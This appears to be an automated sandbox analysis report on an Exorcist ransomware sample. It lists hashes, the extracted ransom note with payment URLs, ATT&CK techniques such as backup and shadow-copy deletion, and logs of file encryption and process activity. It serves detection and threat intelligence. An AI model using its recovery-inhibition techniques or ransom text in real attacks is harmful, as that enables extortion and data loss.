exorcist | d7d0688022b5848caf5cbabc1bde628cb74f32e014311f5299ed63241fff72b0

Resubmissions

23-09-2020 10:35

200923-mkwlt9yalx 10

23-07-2020 14:59

200723-mtbw6t99d2 10

23-07-2020 13:47

200723-5t3mhtw95x 10

Analysis

max time kernel
137s
max time network
152s
platform
windows10_x64
resource
win10
submitted
23-09-2020 10:35

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

build-x64-crypt.bin.exe
Size

52KB
MD5

8cc13fea61cc0ba1382a779ee46726f0
SHA1

bd8ef46a02085153605a87fcc047f7ef3d0c4131
SHA256

eeb8a83d7532797d39d060ffb2a65562e8d803c4dbd8379289f99367cac2f850
SHA512

2f317f04b6bda9af58b049cb9bd0032d08c0aa30b8ac8d76b10f738ab11f4cc9f4eca4af3ecf26e610715117e2d68e5f8fb0ac139e60e882cc24fc795bf0a34a

Score

10^/10

ransomware evasion exorcist persistence

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\ArlomQ-decrypt.hta

Family

exorcist

Ransom Note

ArlomQ Decrypt All your data has been encrypted with Exorcist Ransomware. Do not worry: you have some hours to contact us and decrypt your data by paying a ransom. To do this, follow instructions on this web site: http://217.8.117.26/pay Also, you can install Tor Browser and use this web site: http://4dnd3utjsmm2zcsb.onion/pay IMPORTANT: Do not modify this file, otherwise you will not be able to recover your data! Your authorization key: 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

URLs

http://217.8.117.26/pay

http://4dnd3utjsmm2zcsb.onion/pay

Signatures

Exorcist
Ransomware-as-a-service which avoids infecting machines in CIS nations. First seen in mid-2020.
ransomware exorcist
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
ransomware evasion

Inhibit System Recovery
T1490

Processes:

bcdedit.exebcdedit.exe

pid process

2936 bcdedit.exe
1332 bcdedit.exe
Deletes System State backups 3 TTPs 2 IoCs
Uses wbadmin.exe to inhibit system recovery.
ransomware

Command-Line Interface
T1059

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

wbadmin.exewbadmin.exe

pid process

1844 wbadmin.exe
2128 wbadmin.exe

pid	process
2936	bcdedit.exe
1332	bcdedit.exe

pid	process
1844	wbadmin.exe
2128	wbadmin.exe

Modifies extensions of user files 28 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

build-x64-crypt.bin.exe

description	ioc	process
File renamed	C:\Users\Admin\Pictures\CheckpointSave.crw => C:\Users\Admin\Pictures\CheckpointSave.crw.ArlomQ	build-x64-crypt.bin.exe
File renamed	C:\Users\Admin\Pictures\FormatPop.png => C:\Users\Admin\Pictures\FormatPop.png.ArlomQ	build-x64-crypt.bin.exe
File opened for modification	C:\Users\Admin\Pictures\ResetLimit.crw.ArlomQ	build-x64-crypt.bin.exe
File opened for modification	C:\Users\Admin\Pictures\WaitAssert.tif.ArlomQ	build-x64-crypt.bin.exe
File renamed	C:\Users\Admin\Pictures\DisconnectWrite.tiff => C:\Users\Admin\Pictures\DisconnectWrite.tiff.ArlomQ	build-x64-crypt.bin.exe
File opened for modification	C:\Users\Admin\Pictures\RenameConfirm.raw.ArlomQ	build-x64-crypt.bin.exe
File renamed	C:\Users\Admin\Pictures\ResetImport.png => C:\Users\Admin\Pictures\ResetImport.png.ArlomQ	build-x64-crypt.bin.exe
File renamed	C:\Users\Admin\Pictures\ResetLimit.crw => C:\Users\Admin\Pictures\ResetLimit.crw.ArlomQ	build-x64-crypt.bin.exe
File renamed	C:\Users\Admin\Pictures\ConvertFromUninstall.png => C:\Users\Admin\Pictures\ConvertFromUninstall.png.ArlomQ	build-x64-crypt.bin.exe
File opened for modification	C:\Users\Admin\Pictures\DismountJoin.raw.ArlomQ	build-x64-crypt.bin.exe
File opened for modification	C:\Users\Admin\Pictures\MountEnter.tiff	build-x64-crypt.bin.exe
File renamed	C:\Users\Admin\Pictures\WaitAssert.tif => C:\Users\Admin\Pictures\WaitAssert.tif.ArlomQ	build-x64-crypt.bin.exe
File opened for modification	C:\Users\Admin\Pictures\DisconnectWrite.tiff	build-x64-crypt.bin.exe
File opened for modification	C:\Users\Admin\Pictures\ResetImport.png.ArlomQ	build-x64-crypt.bin.exe
File renamed	C:\Users\Admin\Pictures\SuspendInstall.raw => C:\Users\Admin\Pictures\SuspendInstall.raw.ArlomQ	build-x64-crypt.bin.exe
File renamed	C:\Users\Admin\Pictures\SwitchRequest.raw => C:\Users\Admin\Pictures\SwitchRequest.raw.ArlomQ	build-x64-crypt.bin.exe
File opened for modification	C:\Users\Admin\Pictures\CheckpointSave.crw.ArlomQ	build-x64-crypt.bin.exe
File renamed	C:\Users\Admin\Pictures\DismountJoin.raw => C:\Users\Admin\Pictures\DismountJoin.raw.ArlomQ	build-x64-crypt.bin.exe
File renamed	C:\Users\Admin\Pictures\OptimizeBlock.tif => C:\Users\Admin\Pictures\OptimizeBlock.tif.ArlomQ	build-x64-crypt.bin.exe
File renamed	C:\Users\Admin\Pictures\RenameConfirm.raw => C:\Users\Admin\Pictures\RenameConfirm.raw.ArlomQ	build-x64-crypt.bin.exe
File opened for modification	C:\Users\Admin\Pictures\ConvertFromUninstall.png.ArlomQ	build-x64-crypt.bin.exe
File opened for modification	C:\Users\Admin\Pictures\FormatPop.png.ArlomQ	build-x64-crypt.bin.exe
File renamed	C:\Users\Admin\Pictures\MountEnter.tiff => C:\Users\Admin\Pictures\MountEnter.tiff.ArlomQ	build-x64-crypt.bin.exe
File opened for modification	C:\Users\Admin\Pictures\SuspendInstall.raw.ArlomQ	build-x64-crypt.bin.exe
File opened for modification	C:\Users\Admin\Pictures\DisconnectWrite.tiff.ArlomQ	build-x64-crypt.bin.exe
File opened for modification	C:\Users\Admin\Pictures\MountEnter.tiff.ArlomQ	build-x64-crypt.bin.exe
File opened for modification	C:\Users\Admin\Pictures\OptimizeBlock.tif.ArlomQ	build-x64-crypt.bin.exe
File opened for modification	C:\Users\Admin\Pictures\SwitchRequest.raw.ArlomQ	build-x64-crypt.bin.exe

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

build-x64-crypt.bin.exe

description	ioc	process
File opened (read-only)	\??\H:	build-x64-crypt.bin.exe
File opened (read-only)	\??\N:	build-x64-crypt.bin.exe
File opened (read-only)	\??\P:	build-x64-crypt.bin.exe
File opened (read-only)	\??\V:	build-x64-crypt.bin.exe
File opened (read-only)	\??\F:	build-x64-crypt.bin.exe
File opened (read-only)	\??\G:	build-x64-crypt.bin.exe
File opened (read-only)	\??\W:	build-x64-crypt.bin.exe
File opened (read-only)	\??\R:	build-x64-crypt.bin.exe
File opened (read-only)	\??\T:	build-x64-crypt.bin.exe
File opened (read-only)	\??\Y:	build-x64-crypt.bin.exe
File opened (read-only)	\??\Z:	build-x64-crypt.bin.exe
File opened (read-only)	\??\B:	build-x64-crypt.bin.exe
File opened (read-only)	\??\J:	build-x64-crypt.bin.exe
File opened (read-only)	\??\M:	build-x64-crypt.bin.exe
File opened (read-only)	\??\Q:	build-x64-crypt.bin.exe
File opened (read-only)	\??\L:	build-x64-crypt.bin.exe
File opened (read-only)	\??\O:	build-x64-crypt.bin.exe
File opened (read-only)	\??\S:	build-x64-crypt.bin.exe
File opened (read-only)	\??\U:	build-x64-crypt.bin.exe
File opened (read-only)	\??\A:	build-x64-crypt.bin.exe
File opened (read-only)	\??\E:	build-x64-crypt.bin.exe
File opened (read-only)	\??\I:	build-x64-crypt.bin.exe
File opened (read-only)	\??\K:	build-x64-crypt.bin.exe
File opened (read-only)	\??\X:	build-x64-crypt.bin.exe

Modifies service 2 TTPs 5 IoCs

persistence

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

vssvc.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5}	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer	vssvc.exe

Drops file in Windows directory 6 IoCs

Processes:

wbadmin.exewbadmin.exe

description	ioc	process
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.1.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.3.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.2.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.1.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.3.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.2.etl	wbadmin.exe

Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exe

pid process

2556 vssadmin.exe

pid	process
2556	vssadmin.exe

Kills process with taskkill 91 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
2056	taskkill.exe
348	taskkill.exe
1788	taskkill.exe
1788	taskkill.exe
1788	taskkill.exe
2588	taskkill.exe
2120	taskkill.exe
256	taskkill.exe
2588	taskkill.exe
256	taskkill.exe
3768	taskkill.exe
1788	taskkill.exe
268	taskkill.exe
1956	taskkill.exe
3768	taskkill.exe
2120	taskkill.exe
2152	taskkill.exe
2116	taskkill.exe
264	taskkill.exe
2616	taskkill.exe
2744	taskkill.exe
3016	taskkill.exe
3236	taskkill.exe
280	taskkill.exe
3768	taskkill.exe
2484	taskkill.exe
2576	taskkill.exe
3016	taskkill.exe
2784	taskkill.exe
1784	taskkill.exe
2120	taskkill.exe
1792	taskkill.exe
3684	taskkill.exe
2476	taskkill.exe
3640	taskkill.exe
3500	taskkill.exe
2588	taskkill.exe
280	taskkill.exe
280	taskkill.exe
2484	taskkill.exe
3984	taskkill.exe
2960	taskkill.exe
1628	taskkill.exe
260	taskkill.exe
272	taskkill.exe
3148	taskkill.exe
1584	taskkill.exe
2480	taskkill.exe
2120	taskkill.exe
280	taskkill.exe
3768	taskkill.exe
2120	taskkill.exe
2152	taskkill.exe
1332	taskkill.exe
1604	taskkill.exe
3408	taskkill.exe
2112	taskkill.exe
1784	taskkill.exe
2588	taskkill.exe
1332	taskkill.exe
2780	taskkill.exe
1756	taskkill.exe
2492	taskkill.exe
3152	taskkill.exe

NTFS ADS 5 IoCs

Processes:

build-x64-crypt.bin.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Local\Temp\boot.sys:ivrhwmenumbuocvak	build-x64-crypt.bin.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\boot.sys:tpupnbvzicwro	build-x64-crypt.bin.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\boot.sys:xbcqjlijd	build-x64-crypt.bin.exe
File created	C:\Users\Admin\AppData\Local\Temp\boot.sys:iykxevszimranzpu	build-x64-crypt.bin.exe
File created	C:\Users\Admin\AppData\Local\Temp\boot.sys:xbcqjlijd	build-x64-crypt.bin.exe

Suspicious behavior: EnumeratesProcesses 332 IoCs

Processes:

build-x64-crypt.bin.exe

pid	process
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe
3676	build-x64-crypt.bin.exe

Suspicious use of AdjustPrivilegeToken 133 IoCs

Processes:

WMIC.exevssvc.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

description	pid	process
Token: SeIncreaseQuotaPrivilege	3016	WMIC.exe
Token: SeSecurityPrivilege	3016	WMIC.exe
Token: SeTakeOwnershipPrivilege	3016	WMIC.exe
Token: SeLoadDriverPrivilege	3016	WMIC.exe
Token: SeSystemProfilePrivilege	3016	WMIC.exe
Token: SeSystemtimePrivilege	3016	WMIC.exe
Token: SeProfSingleProcessPrivilege	3016	WMIC.exe
Token: SeIncBasePriorityPrivilege	3016	WMIC.exe
Token: SeCreatePagefilePrivilege	3016	WMIC.exe
Token: SeBackupPrivilege	3016	WMIC.exe
Token: SeRestorePrivilege	3016	WMIC.exe
Token: SeShutdownPrivilege	3016	WMIC.exe
Token: SeDebugPrivilege	3016	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3016	WMIC.exe
Token: SeRemoteShutdownPrivilege	3016	WMIC.exe
Token: SeUndockPrivilege	3016	WMIC.exe
Token: SeManageVolumePrivilege	3016	WMIC.exe
Token: 33	3016	WMIC.exe
Token: 34	3016	WMIC.exe
Token: 35	3016	WMIC.exe
Token: 36	3016	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3016	WMIC.exe
Token: SeSecurityPrivilege	3016	WMIC.exe
Token: SeTakeOwnershipPrivilege	3016	WMIC.exe
Token: SeLoadDriverPrivilege	3016	WMIC.exe
Token: SeSystemProfilePrivilege	3016	WMIC.exe
Token: SeSystemtimePrivilege	3016	WMIC.exe
Token: SeProfSingleProcessPrivilege	3016	WMIC.exe
Token: SeIncBasePriorityPrivilege	3016	WMIC.exe
Token: SeCreatePagefilePrivilege	3016	WMIC.exe
Token: SeBackupPrivilege	3016	WMIC.exe
Token: SeRestorePrivilege	3016	WMIC.exe
Token: SeShutdownPrivilege	3016	WMIC.exe
Token: SeDebugPrivilege	3016	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3016	WMIC.exe
Token: SeRemoteShutdownPrivilege	3016	WMIC.exe
Token: SeUndockPrivilege	3016	WMIC.exe
Token: SeManageVolumePrivilege	3016	WMIC.exe
Token: 33	3016	WMIC.exe
Token: 34	3016	WMIC.exe
Token: 35	3016	WMIC.exe
Token: 36	3016	WMIC.exe
Token: SeBackupPrivilege	1056	vssvc.exe
Token: SeRestorePrivilege	1056	vssvc.exe
Token: SeAuditPrivilege	1056	vssvc.exe
Token: SeDebugPrivilege	272	taskkill.exe
Token: SeDebugPrivilege	1772	taskkill.exe
Token: SeDebugPrivilege	2120	taskkill.exe
Token: SeDebugPrivilege	2736	taskkill.exe
Token: SeDebugPrivilege	3148	taskkill.exe
Token: SeDebugPrivilege	2488	taskkill.exe
Token: SeDebugPrivilege	2116	taskkill.exe
Token: SeDebugPrivilege	264	taskkill.exe
Token: SeDebugPrivilege	1756	taskkill.exe
Token: SeDebugPrivilege	2484	taskkill.exe
Token: SeDebugPrivilege	3984	taskkill.exe
Token: SeDebugPrivilege	2576	taskkill.exe
Token: SeDebugPrivilege	3768	taskkill.exe
Token: SeDebugPrivilege	268	taskkill.exe
Token: SeDebugPrivilege	2056	taskkill.exe
Token: SeDebugPrivilege	2476	taskkill.exe
Token: SeDebugPrivilege	2616	taskkill.exe
Token: SeDebugPrivilege	1584	taskkill.exe
Token: SeDebugPrivilege	1604	taskkill.exe

Suspicious use of WriteProcessMemory 392 IoCs

Processes:

build-x64-crypt.bin.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 3676 wrote to memory of 2568	3676	build-x64-crypt.bin.exe	cmd.exe
PID 3676 wrote to memory of 2568	3676	build-x64-crypt.bin.exe	cmd.exe
PID 2568 wrote to memory of 3016	2568	cmd.exe	WMIC.exe
PID 2568 wrote to memory of 3016	2568	cmd.exe	WMIC.exe
PID 3676 wrote to memory of 1644	3676	build-x64-crypt.bin.exe	cmd.exe
PID 3676 wrote to memory of 1644	3676	build-x64-crypt.bin.exe	cmd.exe
PID 1644 wrote to memory of 1844	1644	cmd.exe	wbadmin.exe
PID 1644 wrote to memory of 1844	1644	cmd.exe	wbadmin.exe
PID 3676 wrote to memory of 1568	3676	build-x64-crypt.bin.exe	cmd.exe
PID 3676 wrote to memory of 1568	3676	build-x64-crypt.bin.exe	cmd.exe
PID 1568 wrote to memory of 2128	1568	cmd.exe	wbadmin.exe
PID 1568 wrote to memory of 2128	1568	cmd.exe	wbadmin.exe
PID 3676 wrote to memory of 2472	3676	build-x64-crypt.bin.exe	cmd.exe
PID 3676 wrote to memory of 2472	3676	build-x64-crypt.bin.exe	cmd.exe
PID 2472 wrote to memory of 2936	2472	cmd.exe	bcdedit.exe
PID 2472 wrote to memory of 2936	2472	cmd.exe	bcdedit.exe
PID 3676 wrote to memory of 3408	3676	build-x64-crypt.bin.exe	cmd.exe
PID 3676 wrote to memory of 3408	3676	build-x64-crypt.bin.exe	cmd.exe
PID 3408 wrote to memory of 1332	3408	cmd.exe	bcdedit.exe
PID 3408 wrote to memory of 1332	3408	cmd.exe	bcdedit.exe
PID 3676 wrote to memory of 3356	3676	build-x64-crypt.bin.exe	cmd.exe
PID 3676 wrote to memory of 3356	3676	build-x64-crypt.bin.exe	cmd.exe
PID 3356 wrote to memory of 2556	3356	cmd.exe	vssadmin.exe
PID 3356 wrote to memory of 2556	3356	cmd.exe	vssadmin.exe
PID 3676 wrote to memory of 3236	3676	build-x64-crypt.bin.exe	cmd.exe
PID 3676 wrote to memory of 3236	3676	build-x64-crypt.bin.exe	cmd.exe
PID 3236 wrote to memory of 3744	3236	cmd.exe	VSSVC.exe
PID 3236 wrote to memory of 3744	3236	cmd.exe	VSSVC.exe
PID 3676 wrote to memory of 1312	3676	build-x64-crypt.bin.exe	cmd.exe
PID 3676 wrote to memory of 1312	3676	build-x64-crypt.bin.exe	cmd.exe
PID 1312 wrote to memory of 272	1312	cmd.exe	taskkill.exe
PID 1312 wrote to memory of 272	1312	cmd.exe	taskkill.exe
PID 3676 wrote to memory of 3016	3676	build-x64-crypt.bin.exe	cmd.exe
PID 3676 wrote to memory of 3016	3676	build-x64-crypt.bin.exe	cmd.exe
PID 3016 wrote to memory of 1772	3016	cmd.exe	taskkill.exe
PID 3016 wrote to memory of 1772	3016	cmd.exe	taskkill.exe
PID 3676 wrote to memory of 1844	3676	build-x64-crypt.bin.exe	cmd.exe
PID 3676 wrote to memory of 1844	3676	build-x64-crypt.bin.exe	cmd.exe
PID 1844 wrote to memory of 2120	1844	cmd.exe	taskkill.exe
PID 1844 wrote to memory of 2120	1844	cmd.exe	taskkill.exe
PID 3676 wrote to memory of 2148	3676	build-x64-crypt.bin.exe	cmd.exe
PID 3676 wrote to memory of 2148	3676	build-x64-crypt.bin.exe	cmd.exe
PID 2148 wrote to memory of 2736	2148	cmd.exe	taskkill.exe
PID 2148 wrote to memory of 2736	2148	cmd.exe	taskkill.exe
PID 3676 wrote to memory of 2472	3676	build-x64-crypt.bin.exe	cmd.exe
PID 3676 wrote to memory of 2472	3676	build-x64-crypt.bin.exe	cmd.exe
PID 2472 wrote to memory of 3148	2472	cmd.exe	taskkill.exe
